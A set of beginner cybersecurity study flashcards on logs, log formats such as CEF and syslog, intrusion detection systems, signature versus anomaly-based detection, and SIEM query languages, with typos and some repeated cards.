Unit 6 - Module 4 - IDS & SIEM Tools Flashcards

1
Q

What is a record of events that occur within an organization’s systems?

A

A Log

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is the process of examining logs to identify events of interest?

A

Log Analysis

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is the process of examining logs to idenify events of interest?

A

Log Analysis

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What are the 5 most common log types?

A

1) Network
2) System
3) Application
4) Security
5) Authentication

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is the process of collecting, storing, analyzing, and disposing of log data?

A

Log Management

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is a set of data that presents two linked itmes?

ie) a key and it’s corresponding value. “Alert” : “Malware”

A

Key-Value Pair

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is a data type that stores data in a comma-seperated list of key-value pairs?

ie ) “User”
{
“id”: “1234”,
“name”: “user”,
“role”: “engineer”
}

A

Object

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What is a data type that stores data in a comma-separated ordered list?

A

Array

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What log format that uses key-value pairs to structure data and identify fields and their corresponding values?

ie) CEF:Version|Device Vendor|Device Product|Device Version|Signature ID|Name|Severity|Extension

A

Common Event Format (CEF)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What 3 capabilities can syslog be used for?

A

Service
Protocol
Log Format

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What is the collection and transmission of data for analysis?

A

Telemetry

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What’s an application that monitors activity and alerts on possible intrusions?

A

Intrusion Detection System (IDS)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What is it called when any device connected on a network?

A

Endpoint

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What is an application that monitors the acitivty of the host on which it’s installed?

A

Host-Based Intrusion Detection System (HIDS)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What application collects and monitors network traffic and network data?

A

Network-based intrusion detection system (NIDS)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is a detection method used to find events of interest?

A

Signature analysis

17
Q

When monitoring activity, what specifies the rules used by an intrusion detection system (IDS)?

A

A signature

18
Q

What specifies the rules that an IDS uses to monitor activity. Signature analysis is one of the most common methods of detection used by IDS tools.

A

A Signature

19
Q

What’s an advantage of using signatures?

A

Low rate of false positives - It’s very efficient at detecting known threats because it is simly compairing acitivity to signatures.

20
Q

What are 3 disadvantages of using signatures?

A

They can be evaded- Signatures are unique, and attackers can modify their attack behaviours to bypass the signatures.

Signatures require updates - Signature-based analysis rilies on database of signatures to detect threats.

Inabliity to detect unknown threats - Signature-based analysis relies on detecting known threats through signatures.

21
Q

What do you call a pattern that is associated with malicious activity?

A

A Signature

22
Q

What is a detection method that identies abnormal behaviour?

A

Anomaly-based Analysis

23
Q

What’s the one advantage of anomaly-based analysis?

A

Ability to detect new and evolving threats.

24
Q

What are two disadvantages of anomaly-based analysis?

A

High rate of false positives

Pre-existing compromise

25
Q

What is the edtection methods used to find events of interest?

A

Signature Analysis

26
Q

What is a file used to configure the settings of an application?

A

Configuration File

27
Q

In these 3 steps, what tool follows these?

Collect and aggregate data

Normalize Data

Analyze Data

A

**Security Information and Event Management (SIEM Tool) **

28
Q

What search language is “Search Processing Language (SPL)”?

A

Splunk’s Query Language

29
Q

What is a computer language used to create rules for searching through ingested log data?

A

YARA-L

30
Q

Chronicle uses What search language to normalize data?

A

Unified Data Model

31
Q

What is a special character that can be substituted with any other character?

A

a Wildcard